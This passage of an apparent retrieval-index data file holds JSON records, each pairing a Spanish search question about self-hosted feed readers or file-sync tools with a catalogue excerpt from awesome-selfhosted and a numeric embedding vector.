0.02854, -0.05147, -0.07772, -0.00328, -0.04057, -0.01122, 0.04675, -0.02964, -0.00254, -0.0042, -0.0398, 0.05426, -0.01214, -0.02131, -0.08567, 0.01749, -0.0658, -0.08355, 0.00296, -0.03136, 0.02211, -0.00703, -0.02894, 0.06274, 0.03561, -0.02434, 0.03541, 0.0101, -0.01132, 0.01537, 0.02164, -0.01338, -0.04282, -0.00197, -0.02264, 0.02345, -0.01052, 0.01426, -0.03442, 0.03262, 0.05042, -0.04543, 0.01465, 1e-05, 0.01378, -0.03532, 0.00487, 0.02229, 0.02686, -0.0031, 0.03306, 0.0519, 0.03109, 0.00346, 0.06256, -0.00378, -0.03519, 0.02359, 0.01237, -0.02073, 0.01619, 0.03202, 0.02289, -0.07796, 0.04678, -0.04997, -0.04812, -0.01822, 0.0213, 0.04681, -0.05861, 0.09213, -0.01195]} +{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: Stringer β€” Work-in-progress self-hosted, anti-social RSS reader [MIT, Ruby]. Tiny Tiny RSS β€” Web-based news feed (RSS/Atom) reader and aggregator [GPL-3.0, Docker/PHP]. TinyFeed β€” Generate a static HTML page from a collection of feeds with a simple CLI [MIT, Go/Docker]. Upvote RSS β€” Generate rich RSS feeds from Reddit, Hacker News, Lemmy, Mbin, and more [⚠, MIT, Docker/PHP]. Yarr β€” Yarr (yet another rss reader) is a web-based feed aggregator which can be used both as a desktop application and a personal self-hosted server [MIT, Go].", "indexar": "que programa puedo usar para leer noticias en formato RSS o Atom?", "v": [-0.1299, 0.03041, -0.03154, -0.26818, -0.01367, -0.08281, -0.06478, -0.07385, -0.13456, 0.02531, -0.12205, -0.26115, 0.01531, -0.00936, 0.06179, -0.06847, 0.08317, -0.03857, 0.04097, 0.01609, 0.02536, -0.10159, -0.11608, -0.01183, 0.02434, 0.0491, 0.0187, 0.07123, -0.0352, -0.03867, -0.0218, 0.02599, 0.10207, -0.04057, -0.16991, 0.08812, 0.13372, 0.01781, -0.03408, 0.15561, 0.02101, 0.02663, 0.00045, 0.11349, 0.06366, 0.0413, 0.00768, -0.02533, -0.0322, -0.12077, 0.03742, 0.10305, -0.03783, 0.05214, -0.0257, -0.03254, 0.0701, -0.19324, -0.18264, 0.02133, 0.00347, 0.04455, -0.00472, -0.09947, -0.13049, -0.00628, 0.01888, 0.09167, -0.15262, 0.00601, -0.03195, -0.03693, 0.01969, 0.02377, -0.01905, 0.05283, -0.10853, -0.003, 0.00531, 0.05145, -0.01434, -0.03736, 0.09535, 0.04519, -0.05985, -0.00105, 0.0687, 0.00929, -0.06864, -0.02408, -0.06531, 0.11248, 0.01037, 0.05458, 0.06145, -0.07746, 0.03467, -0.03724, 0.00688, 0.01749, 0.007, -0.03096, -0.04602, 0.08034, 0.0301, -0.0346, -0.02554, -0.00513, 0.04673, 0.10869, -0.00697, 0.07987, -0.05308, -0.03055, -0.09801, 0.02752, 0.0272, -0.08348, -0.07043, -0.08216, 0.01738, 0.12669, -0.05998, 0.02469, 0.16381, 0.04175, 0.02427, 0.03767, -0.13859, 0.03997, 0.02519, 0.05915, -0.05635, 0.0019, -0.04277, -0.08559, 0.0396, 0.04024, 0.00992, -0.0049, 0.00339, 0.07354, 0.02363, 0.05589, -0.004, -0.05446, 0.04234, 0.02644, -0.06074, -0.0414, 0.0221, -0.02491, 0.03307, -0.00573, -0.07031, -0.11592, 0.04232, -0.05165, -0.05534, 0.07882, -0.07808, 0.05632, 0.01123, -0.04038, -0.01244, -0.07554, 0.0426, -0.01381, 0.00045, 0.10174, 0.00415, 0.02911, 0.03038, -0.03513, 0.02412, -0.01148, -0.04791, -0.02117, 0.05511, 0.02129, -0.04317, 0.02832, -0.023, 0.06339, -0.0424, -0.01367, -0.0039, 0.04758, -0.03439, -0.03975, -0.01443, -0.00889, 0.05078, -0.0246, 0.0397, 0.00303, -0.00794, -0.0042, 0.02126, -0.03494, -0.02514, 0.02857, 0.04383, -0.02845, 0.02222, 0.01353, 0.01668, -0.00643, 0.04284, 0.06653, 0.01047, -0.0183, 0.00726, -0.0051, -0.02178, -0.04025, -0.00994, 0.07995, 0.04015, 0.03259, 0.01847, 0.02714, 0.05437, 0.02663, 0.02676, -0.08644, -0.00291, -0.02217, -0.00833, 0.07168, -0.05188, 0.05234, 0.03568, 0.02316, 0.00196, -0.03286, -0.00908, 0.06525, -0.02435, -0.04309, -0.05287, 0.05732, 0.02013, 0.04287, -0.03009, 0.00518, -0.0912, 0.05979, -0.00779, -0.02212, 0.00184, 0.01019, 0.06003, -0.09061, 0.00508, 0.0891]} +{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: Stringer β€” Work-in-progress self-hosted, anti-social RSS reader [MIT, Ruby]. Tiny Tiny RSS β€” Web-based news feed (RSS/Atom) reader and aggregator [GPL-3.0, Docker/PHP]. TinyFeed β€” Generate a static HTML page from a collection of feeds with a simple CLI [MIT, Go/Docker]. Upvote RSS β€” Generate rich RSS feeds from Reddit, Hacker News, Lemmy, Mbin, and more [⚠, MIT, Docker/PHP]. Yarr β€” Yarr (yet another rss reader) is a web-based feed aggregator which can be used both as a desktop application and a personal self-hosted server [MIT, Go].", "indexar": "cual es una alternativa libre y autoalojable para un lector de feeds?", "v": [0.00105, -0.02998, -0.11154, -0.02906, -0.12396, 0.0264, -0.05542, 0.05096, -0.12663, -0.04326, -0.06352, -0.2141, 0.00892, 0.07399, 0.129, -0.12832, 0.10131, -0.13558, 0.01927, -0.05773, -0.00262, 0.06098, -0.1576, -0.12267, 0.06741, 0.00916, 0.11623, -0.04159, -0.06061, 0.10534, -0.07614, -0.00839, 0.0859, 0.03863, -0.04987, 0.09055, 0.13087, 0.13939, 0.05589, 0.03544, 0.04402, 0.013, 0.01651, 0.00452, -0.00205, 0.02609, -0.08555, 0.0149, -0.08371, 0.08943, -0.00094, 0.00637, -0.05318, 0.04668, -0.0693, 0.04553, 0.14092, -0.08879, -0.02959, -0.01098, -0.04198, 0.11188, 0.01556, -0.11523, 0.03175, 0.00039, -0.02136, 0.04912, -0.04218, -0.02774, 0.03462, -0.11006, 0.08724, 0.08223, -0.06938, 0.08496, -0.11565, 0.06843, 0.04352, 0.08986, 0.1057, -0.1503, -0.03688, 0.07201, 0.14635, 0.06974, 0.06504, -0.11433, -0.03585, 0.12023, -0.01327, 0.0805, 0.03921, 0.07874, -0.05376, -0.05509, 0.03119, -0.02299, -0.06717, 0.03189, 0.11415, -0.08106, -0.02026, 0.02323, 0.03614, -0.12801, -0.04932, 0.03444, 0.01337, 0.04594, 0.01124, 0.10071, -0.08236, -0.02546, -0.03078, 0.01962, -0.06944, 0.05901, 0.0084, -0.05144, -0.09284, 0.01879, -0.11213, -0.01727, 0.01983, 0.06456, 0.06543, 0.02753, -0.01024, 0.02209, 0.07367, -0.02757, -0.06117, -0.13079, -0.08183, -0.04316, 0.05443, -0.03578, -0.07383, 0.04893, -0.05336, 0.04297, 0.05306, 0.04433, -0.00339, -0.09689, -0.01498, -0.00096, -0.05027, 0.01171, -0.1273, 0.01371, 0.00264, 0.0323, -0.0242, -0.03422, -0.03811, -0.00331, 0.00951, 0.03878, 0.00697, -0.00311, 0.07854, -0.01609, -0.03918, -0.08303, 0.02187, -0.04293, 0.00244, -0.0085, -0.03588, 0.05569, 0.03215, -0.02705, 0.07632, -0.07611, -0.04209, -0.00022, -0.01678, 0.0492, -0.03413, -0.00725, -0.05509, 0.01831, -0.00635, -0.03691, -0.02279, -0.02681, 0.00981, -0.0356, -0.00842, 0.05424, -0.03393, -0.07346, 0.08447, 0.06559, -0.00929, -0.00399, 0.01947, -0.0672, -0.09565, -0.00321, 0.01095, 0.06389, 0.01752, -0.04153, -0.00512, 0.08919, -0.01176, 0.04009, 0.08356, 0.05227, 0.06449, 0.03111, -0.07048, -0.00281, -0.00226, 0.00218, -0.02878, -0.02213, 0.06343, -0.04215, 0.0088, 0.00137, -0.03037, -0.02978, -0.0044, 0.02462, -0.03166, -0.01353, 0.05627, -0.02604, -0.00645, 0.0924, -0.03416, 0.04155, -0.05258, 0.07972, 0.05829, 0.00023, 0.00655, 0.04162, 0.01622, -0.02464, -0.01603, 0.01164, -0.0461, -0.00367, -0.0978, -0.02694, 0.00234, -0.05478, 0.00265, 0.0054, 0.10263, 0.02675]} +{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: Stringer β€” Work-in-progress self-hosted, anti-social RSS reader [MIT, Ruby]. Tiny Tiny RSS β€” Web-based news feed (RSS/Atom) reader and aggregator [GPL-3.0, Docker/PHP]. TinyFeed β€” Generate a static HTML page from a collection of feeds with a simple CLI [MIT, Go/Docker]. Upvote RSS β€” Generate rich RSS feeds from Reddit, Hacker News, Lemmy, Mbin, and more [⚠, MIT, Docker/PHP]. Yarr β€” Yarr (yet another rss reader) is a web-based feed aggregator which can be used both as a desktop application and a personal self-hosted server [MIT, Go].", "indexar": "con que herramienta genero un sitio web estΓ‘tico desde varias fuentes de alimentaciΓ³n?", "v": [-0.05461, 0.0002, -0.12264, -0.1135, -0.00127, -0.0462, -0.03115, -0.07035, -0.0803, -0.05868, -0.00776, -0.01929, -0.06811, -0.04234, 0.10758, 0.01947, 0.07557, -0.08186, 0.0395, -0.01856, -0.04852, -0.04907, -0.0172, -0.12071, -0.08249, -0.08396, 0.06223, -0.05727, -0.12618, 0.19563, 0.05292, -0.03073, 0.00257, -0.04648, -0.17099, -0.0289, 0.00217, 0.09831, -0.04539, -0.05181, -0.10463, -0.083, -0.06861, -0.00026, -0.06344, 0.00362, -0.04499, -0.11269, 0.15426, 0.09316, 0.04625, -0.15671, -0.10918, -0.00121, -0.05518, -0.00845, 0.16449, -0.12134, 0.00619, 0.00416, -0.07876, 0.10582, 0.0155, -0.12102, -0.0841, 0.10387, -0.03823, 0.00095, -0.08483, -0.00789, -0.02553, -0.03199, 0.12594, -0.03462, 0.0724, -0.03928, 0.05177, 0.14456, 0.02599, 0.00594, 0.01024, -0.02874, -0.03189, 0.05503, -0.13745, -0.1048, 0.08963, -0.02146, 0.01444, -0.10236, 0.07927, 0.07564, 0.00115, 0.03149, -0.11474, -0.09886, -0.00298, -0.08989, -0.00764, -0.00092, 0.06854, -0.07133, -0.14286, -0.00565, 0.07638, 0.03021, -0.06201, -0.09868, -0.10461, 0.04618, 0.00949, 0.01094, 0.02269, -0.03932, -0.01737, 0.13684, -0.00481, -0.01418, 0.00439, -0.11253, 0.03732, 0.03847, -0.09704, 0.05462, -0.05059, 0.04704, -0.00301, 0.0235, 0.0326, -0.09525, 0.01106, -0.07184, -0.01441, -0.01786, 0.04552, -0.08547, -0.00094, -0.00619, 0.05367, -0.03619, -0.03708, -0.00669, 0.00126, -0.01371, 0.02224, -0.06052, -0.0259, -0.06019, -0.11997, 0.04801, -0.06376, 0.02326, 0.03052, -0.00021, -0.10728, 0.07866, -0.10507, 0.00244, -0.07644, 0.00254, -0.04864, 0.00262, 0.05579, -0.01777, 0.00386, -0.04016, -0.04626, 0.02294, 0.00492, 0.05827, -0.01626, 0.08271, -0.0103, -0.02957, 0.02483, -0.05021, -0.08594, -0.06538, 0.00577, 0.01824, -0.08526, -0.02601, -0.10273, 0.03572, 0.03283, -0.01971, 0.05968, -0.07159, -0.01722, 0.04182, 0.02753, 0.01776, 0.00271, 0.00309, 0.10417, 0.07144, -0.02763, 0.03318, 0.08125, -0.0275, -0.05545, -0.05613, 0.03652, -0.02364, 0.02128, 0.04891, 0.00382, -0.06931, -0.11492, -0.04256, 0.06305, -0.00135, 0.04218, -0.1056, -0.02757, -0.06445, 0.04077, -0.03836, -0.0506, 0.01134, 0.0071, 0.01198, -0.00031, -0.03653, -0.0028, 0.00163, 0.03499, -0.01942, -0.0266, 0.01646, 0.05376, -0.05002, -0.05311, -0.02144, -0.00624, -0.01797, 0.02498, 0.03281, -0.02977, 0.00076, -0.02357, 0.02342, -0.01664, -0.00599, -0.00998, -0.09891, -0.03958, -0.03399, 0.00868, -0.06382, 0.02032, -0.02434, 0.02137, -0.05836, -0.00083, -0.03904]} +{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: bewCloud β€” File sharing + sync, notes, and photos (alternative to Nextcloud and ownCloud's RSS reader) [AGPL-3.0, Docker]. Cloudreve β€” File management and sharing system, supports multiple storage providers [GPL-3.0, Docker/Go]. Git Annex β€” File synchronization between computers, servers, external drives [GPL-3.0, Haskell]. Kinto β€” Minimalist JSON storage service with synchronisation and sharing abilities [Apache-2.0, Python]. Nextcloud β€” Access and share your files, calendars, contacts, mail and [more](https://apps.nextcloud.com/) from any device, on your terms [AGPL-3.0, PHP/deb]. OpenCloud β€” File Sharing and Collaboration Platform [Apache-2.0, Docker/Go/Nodejs]. OpenSSH SFTP server β€” Secure File Transfer Program [BSD-2-Clause, C/deb]. ownCloud β€” All-in-one solution for saving, synchronizing, viewing, editing and sharing files, calendars, address books and more [AGPL-3.0, PHP/Docker/deb].", "indexar": "que programa hay para sincronizar archivos entre varios dispositivos sin usar la nube?", "v": [-0.0551, -0.0989, -0.18088, -0.1252, 0.02152, -0.09011, -0.10891, -0.07768, -0.11084, -0.1005, -0.08938, -0.13598, -0.06547, -0.01372, -0.08367, -0.08639, -0.01301, -0.09887, 0.0621, 0.05713, -0.04444, 0.01018, -0.01681, -0.00413, -0.12283, 0.05472, 0.0416, 0.05772, -0.1375, -0.03389, -0.08312, -0.00902, 0.18216, -0.03794, -0.05546, -0.04597, 0.03707, 0.0471, -0.11113, 0.06932, -0.03522, 0.0314, -0.09517, 0.11291, -0.01286, -0.02089, 0.01399, -0.01482, 0.02033, 0.06872, -0.06121, 0.07978, -0.01462, 0.10654, -0.04259, -0.12927, -0.01249, -0.11493, 0.00552, -0.03735, -0.09125, 0.06631, 0.00417, -0.10598, -0.01567, 0.01578, -0.00673, 0.07681, -0.18241, 0.06416, 0.1311, 0.09099, 0.04414, 0.02943, 0.0117, 0.16965, -0.03225, -0.07757, -0.03162, 0.04193, 0.02209, 0.04888, 0.04631, 0.00613, -0.15954, -0.03356, 0.1051, 0.0686, 0.01817, 0.02274, -0.01184, 0.06766, 0.0539, 0.03643, 0.10513, -0.03129, 0.07068, 0.07513, -0.00729, 0.04889, 0.11712, 0.00923, -0.03649, 0.064, -0.11972, 0.08997, 0.08786, -0.00217, 0.02411, -0.00331, 0.01991, -0.01606, 0.00726, 0.01993, -0.14389, 0.00631, 0.06415, -0.12935, -0.00829, -0.05844, -0.06046, -0.00298, 0.03282, -0.05414, 0.15787, 0.01976, 0.01206, 0.06347, -0.10055, 0.05713, 0.02706, 0.00445, 0.03099, 0.02339, -0.07957, -0.04626, -0.05994, -0.0892, -0.03599, -0.04072, 0.12104, 0.02594, -0.02482, 0.07248, 0.08674, -0.04095, 0.02674, -0.00905, -0.01715, -0.02206, 0.00396, -0.01321, -0.09058, -0.01238, -0.11089, 0.05027, -0.00434, -0.03334, -0.1118, 0.00175, -0.03011, -0.01562, -0.06082, 0.02298, 0.03621, -0.08436, 0.04071, 0.04444, 0.04649, 0.06593, 0.01984, 0.07616, 0.00636, -0.04633, 0.00799, 0.04767, 0.06201, -0.03081, 0.04577, -0.03911, -0.0552, 0.00053, 0.05427, 0.0349, 0.01327, -0.01231, -0.00429, 0.04897, -0.0538, 0.06144, -0.04475, 0.0021, 0.00417, 0.0261, 0.03619, -0.04141, -0.06143, -0.01572, 0.00539, -0.00102, -0.04796, 0.04204, -0.03222, -0.01978, 0.06938, 0.04398, -0.0333, 0.01922, 0.07135, 0.02853, -0.00287, -0.05623, -0.00394, 0.01844, 0.02929, -0.01919, -0.02392, 0.04166, 0.03425, -0.01865, 0.03273, 0.00313, 0.00685, 0.02074, -0.02321, 0.02307, -0.04706, 0.06106, -0.0117, -0.06939, -0.03224, -0.03164, 0.00924, -0.00882, 0.00343, 0.03058, 0.01883, 0.00495, 0.01493, -0.05367, -0.10127, 0.08292, 0.01848, -0.0104, -0.10246, 0.01081, -0.06063, -0.01622, 0.00555, 0.00625, 0.02118, 0.11156, 0.03883, -0.0283, 0.01405, 0.07525]} +{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: bewCloud β€” File sharing + sync, notes, and photos (alternative to Nextcloud and ownCloud's RSS reader) [AGPL-3.0, Docker]. Cloudreve β€” File management and sharing system, supports multiple storage providers [GPL-3.0, Docker/Go]. Git Annex β€” File synchronization between computers, servers, external drives [GPL-3.0, Haskell]. Kinto β€” Minimalist JSON storage service with synchronisation and sharing abilities [Apache-2.0, Python]. Nextcloud β€” Access and share your files, calendars, contacts, mail and [more](https://apps.nextcloud.com/) from any device, on your terms [AGPL-3.0, PHP/deb]. OpenCloud β€” File Sharing and Collaboration Platform [Apache-2.0, Docker/Go/Nodejs]. OpenSSH SFTP server β€” Secure File Transfer Program [BSD-2-Clause, C/deb]. ownCloud β€” All-in-one solution for saving, synchronizing, viewing, editing and sharing files, calendars, address books and more [AGPL-3.0, PHP/Docker/deb].", "indexar": "cual es una alternativa libre a Nextcloud que soporte fotos y notas?", "v": [-0.10416, 0.09423, -0.11493, -0.10478, -0.15257, -0.14627, -0.09727, -0.08063, -0.10551, -0.02071, -0.13526, -0.2145, -0.05407, 0.07217, -0.00737, -0.11103, 0.04813, -0.07889, 0.11245, 0.06443, -0.11705, -0.02034, -0.18232, -0.0926, 0.0072, -0.06824, 0.05175, 0.10254, -0.01843, 0.0114, 0.02715, -0.14682, 0.04789, -0.00179, -0.09118, 0.01621, 0.16451, 0.03089, -0.02236, -0.06706, -0.06075, -0.07403, 0.02807, 0.09038, 0.0282, -0.12544, -0.10036, 0.04555, 0.00712, 0.02614, 0.01501, -0.07817, -0.04548, 0.04753, -0.03418, -0.07195, 0.18374, -0.10463, -0.09235, -0.03787, -0.07353, 0.13109, -0.0403, -0.05987, -0.04327, 0.08022, -0.0662, 0.01607, -0.13561, 0.0652, 0.10693, 0.06587, 0.13516, -0.12625, -0.08456, 0.07608, 0.01626, -0.04432, -0.0672, 0.05787, -0.03531, 0.05499, -0.04504, 0.08138, -0.09022, -0.05434, 0.01414, -0.06815, -0.04631, 0.06757, 0.04934, 0.0013, -0.0066, 0.07564, 0.00603, -0.05102, -0.00235, 0.06963, -0.00388, -0.02445, 0.08499, -0.02537, -0.01267, -0.07466, -0.06223, -0.01612, 0.04581, -0.04566, -0.10565, 0.00732, 0.01513, 0.06396, -0.01537, 0.06698, 0.02602, -0.05868, 0.04148, -0.01007, 0.01323, 0.03439, 0.10586, -0.02889, -0.0157, -0.12027, 0.07154, 0.07041, -0.0211, 0.00783, -0.01699, 0.06675, -0.04235, 0.00043, -0.03525, -0.03679, -0.00065, -0.03056, 0.02999, -0.02408, 0.02391, -0.08289, 0.02355, -0.02429, 0.02518, -0.03926, 0.00844, -0.03823, 0.0265, -0.03745, -0.01759, -0.00943, -0.04747, 0.03431, -0.04656, 0.11326, -0.05873, 0.03277, -0.01013, 0.00499, -0.10133, 0.03699, -0.01005, -0.02511, 0.00781, 0.07075, -0.05336, -0.06716, -0.00342, -0.03933, -0.03452, 0.04204, -0.03728, 0.02199, 0.02899, -0.04801, 0.06211, -0.0642, 0.02735, -0.13334, 0.03462, -0.03437, -0.03321, 0.01549, 0.00468, 0.04787, 0.05593, 0.00479, -0.01091, 0.00268, -0.00628, 0.01342, 0.01652, 0.00997, -0.08266, -0.05339, 0.02641, -0.02511, -0.0381, -0.02018, 0.00925, -0.00801, -0.04406, -0.07666, -0.06283, -0.04651, -0.00845, -0.04498, -0.03978, 0.0648, 0.04158, -0.03277, -0.00737, 0.0733, 0.0438, 0.01512, -0.06232, 0.04669, 0.02586, 0.03707, -0.01085, -0.05771, 0.05918, 0.05597, 0.04247, 0.07086, 0.01535, 0.05629, -0.00192, 0.01575, -0.00703, -0.03834, 0.00616, 0.04017, -0.01091, 0.00872, 0.02767, -0.01168, 0.01243, 0.06061, -0.01399, -0.03546, 0.06349, 0.04463, -0.04193, -0.03171, -0.07761, -0.00975, -0.10978, 0.01566, -0.01248, -0.05487, 0.01528, 0.0515, 0.02802, -0.01368, 0.00678, 0.03298]} +{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: bewCloud β€” File sharing + sync, notes, and photos (alternative to Nextcloud and ownCloud's RSS reader) [AGPL-3.0, Docker]. Cloudreve β€” File management and sharing system, supports multiple storage providers [GPL-3.0, Docker/Go]. Git Annex β€” File synchronization between computers, servers, external drives [GPL-3.0, Haskell]. Kinto β€” Minimalist JSON storage service with synchronisation and sharing abilities [Apache-2.0, Python]. Nextcloud β€” Access and share your files, calendars, contacts, mail and [more](https://apps.nextcloud.com/) from any device, on your terms [AGPL-3.0, PHP/deb]. OpenCloud β€” File Sharing and Collaboration Platform [Apache-2.0, Docker/Go/Nodejs]. OpenSSH SFTP server β€” Secure File Transfer Program [BSD-2-Clause, C/deb]. ownCloud β€” All-in-one solution for saving, synchronizing, viewing, editing and sharing files, calendars, address books and more [AGPL-3.0, PHP/Docker/deb].", "indexar": "con que puedo montar un servidor seguro para transferir archivos desde mi ordenador a mis servidores externos?", "v": [0.08451, 0.01641, -0.13494, -0.18081, -0.08229, -0.09073, 0.00935, -0.04869, -0.08045, -0.06385, -0.10082, 0.00236, 0.1301, -0.06105, 0.08996, 0.01786, 0.21401, -0.05263, 0.11027, 0.06366, 0.12236, 0.02751, 0.09406, -0.0847, -0.05262, 0.06417, -0.03625, -0.01556, -0.13815, -0.00147, 0.01201, -0.00075, 0.12164, 0.0015, 0.05464, -0.07123, 0.01457, 0.14483, -0.01815, 0.02126, 0.11812, 0.03478, -0.04587, 0.05694, 0.02308, -0.08977, 0.0463, -0.12744, 0.11234, -0.0413, -0.00905, -0.13516, -0.11437, -0.04634, -0.09728, -0.03171, 0.0759, -0.10206, 0.10639, 0.00113, -0.12608, 0.14474, -0.05786, 0.05926, 0.05968, -0.01492, -0.07441, -0.01372, -0.16664, -0.01901, -0.08469, 0.03313, 0.00585, -0.06155, -0.07075, 0.02629, -0.01448, -0.06662, 0.08473, 0.08111, 0.02852, 0.05695, 0.00835, 0.06152, -0.08621, -0.08283, -0.01752, -0.01666, 0.0868, 0.06725, 0.07622, 0.03159, -0.05066, 0.05644, -0.00502, -0.00405, 0.10437, 0.02364, -0.06256, -0.02614, 0.02767, 0.0765, 0.04432, 0.13672, -0.02998, 0.08799, 0.09272, -0.0486, 0.11328, -0.09692, 0.11487, -0.00207, -0.03963, 0.05416, -0.07108, -0.0579, 0.01803, 0.02001, -0.02689, 0.08554, -0.06023, 0.02755, 0.08871, 0.07694, -0.00797, -0.09083, 0.05851, 0.03215, -0.08197, -0.03007, -0.00463, -0.0213, -0.07179, -0.02624, -0.06642, 0.0298, 0.06283, -0.08776, -0.0264, -0.0439, 0.02374, 0.02882, -0.04051, -0.01108, 0.05067, 0.07244, 0.08781, -0.04539, -0.07389, -0.06046, 0.0273, 0.00876, -0.04083, 0.00508, -0.09779, 0.03702, 0.0263, -0.04725, -0.09603, 0.06083, 0.00402, 0.09905, 0.05051, 0.06816, -0.01247, -0.03188, 0.00791, 0.03017, 0.05257, 0.01856, -0.05996, 0.03035, 0.00171, -0.0821, 0.0314, 0.02655, -0.09938, -0.0273, 0.04453, 0.02761, -0.02022, 0.063, -0.03597, 0.05562, -0.06264, -0.02982, 0.0154, 0.02633, -0.04279, 0.00906, 0.01025, -0.00516, -0.02808, 0.05965, 0.04163, -0.06375, -0.08631, -0.02958, -0.01312, -0.024, -0.01462, -0.03952, -0.04772, -0.03637, 0.02547, 0.01011, -0.05634, 0.03095, -0.00452, 0.06737, -0.03881, -0.00404, 0.11987, -0.02745, 0.00499, -0.01112, 0.04613, -0.05584, -0.00081, 0.004, 0.02981, -0.00313, 0.02989, 0.01332, -0.0091, 0.03539, -0.01906, -0.02105, 0.02906, -0.01104, -0.02729, 0.04796, -0.0026, -0.00368, 0.00337, -0.01368, 0.00221, -0.04147, -0.04906, -0.01517, -0.00051, 0.0722, -0.00121, -0.09462, -0.03493, -0.04321, -0.06904, -0.00083, -0.05435, -0.04096, 0.00565, -0.04134, -0.00748, -0.01702, -0.02727, -0.00179]} +{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: Peergos β€” Secure and private space online where you can store, share and view your photos, videos, music and documents. Also includes a calendar, news feed, task lists, chat and email client [AGPL-3.0, Java]. Puter β€” Web-based operating system designed to be feature-rich, exceptionally fast, and highly extensible [AGPL-3.0, Nodejs/Docker]. Pydio β€” Turn any web server into a powerful file management system and an alternative to mainstream cloud storage providers [AGPL-3.0, Go]. Samba β€” Samba is the standard Windows interoperability suite of programs for Linux and Unix. It provides secure, stable and fast file and print services for all clients using the SMB/CIFS protocol [GPL-3.0, C]. Seafile β€” File hosting and sharing solution primary for teams and organizations [GPL-2.0/GPL-3.0/AGPL-3.0/Apache-2.0, C]. Sync-in β€” File storage, syncing, sharing, and collaboration with real-time editing, permission management, and desktop/CLI clients [AGPL-3.0, Nodejs/Docker].", "indexar": "que programa hay para almacenar y compartir fotos y documentos de forma privada en lΓ­nea", "v": [0.06665, 0.11683, -0.0734, -0.25044, -0.001, -0.13814, 0.05235, -0.03429, -0.08066, -0.13976, -0.04564, -0.04308, 0.04667, -0.12595, 0.02369, 0.00544, 0.14353, -0.0936, 0.01827, -0.00352, -0.07763, 0.12931, -0.10671, -0.04232, -0.05073, -0.02233, 0.07631, -0.0852, -0.08772, 0.06486, 0.04423, 0.0156, 0.0238, 0.01337, -0.03868, 0.02712, 0.10542, -0.04631, -0.06905, -0.00081, 0.00794, 0.03381, -0.04771, 0.14924, -0.08663, 0.04112, -0.03977, 0.0736, -0.02468, -0.0796, -0.04709, -0.03549, 0.02514, 0.11267, -0.02876, -0.13703, 0.05509, -0.07046, 0.06381, 0.06897, -0.03188, 0.06784, 0.00132, 0.01102, 0.02337, 0.01474, 0.01544, -0.00045, -0.18042, 0.01322, 0.0002, 0.06907, 0.08022, -0.06202, -0.02809, -0.0131, -0.02463, -0.01224, -0.05648, 0.04821, -0.06528, -0.03376, -0.02175, 0.09211, -0.11389, -0.08259, 0.00548, -0.0053, 0.03158, 0.02789, 0.05102, 0.01642, -0.00351, 0.06741, -0.05047, -0.09532, 0.09755, 0.11507, 0.02845, -0.05239, 0.05417, 0.04083, -0.03976, 0.06811, -0.07188, 0.04341, 0.01665, -0.05357, -0.01889, 0.08197, 0.04008, 0.00243, 0.03309, 0.05663, -0.04195, -0.00267, 0.03448, -0.04448, -0.00259, -0.09201, -0.01293, -0.00681, -0.02337, -0.01539, 0.12912, -0.02419, -0.13869, 0.09914, -0.10476, 0.08316, -0.08952, 0.04352, -0.08972, -0.03061, 0.00438, -0.08069, -0.07206, -0.05989, 0.02873, -0.12742, -0.02617, -0.05485, -0.04612, -0.05383, -0.02111, 0.01746, 0.00818, -0.05114, -0.07833, -0.02432, 0.01764, 0.02975, -0.01281, -0.00977, -0.07127, 0.0609, -0.0008, -0.06195, -0.10763, 0.00357, -0.08521, 0.05463, 0.00631, -0.01494, -0.00985, -0.08305, -0.00136, -0.03549, 0.01903, 0.00325, 0.03069, -0.01153, -0.01325, -0.12061, 0.02141, -0.02037, -0.00952, -0.07721, 0.08228, 0.0134, -0.12507, 0.05833, 0.06055, 0.0906, -0.0315, -0.02797, 0.00848, 0.09193, 0.02549, -0.01228, 0.01685, 0.0194, -0.02035, 0.03614, 0.00607, -0.0504, -0.07207, 0.05731, 0.12683, 0.00288, -0.05709, -0.0575, -0.01243, 0.00362, 0.00866, 0.02538, -0.10804, -0.00029, 0.04268, 0.04218, -0.04765, -0.01625, 0.08037, -0.10522, -0.12003, 0.00815, -0.00238, 0.02334, -0.00163, 0.00273, -0.00326, 0.01907, 0.06059, -0.0039, 0.06579, -0.02552, 0.01074, 0.08731, 0.02328, 0.01251, -0.00914, 0.07639, -0.02964, -0.04055, 0.09858, 0.03995, -0.01254, -0.07555, -0.02612, -0.10612, 0.00262, 0.08616, -0.03693, -0.02865, -0.04917, -0.0214, -0.0606, 0.043, 0.04933, -0.08186, -0.00845, 0.00033, 0.06003, -0.03885, 0.0251, -0.07364]} +{"tipo": 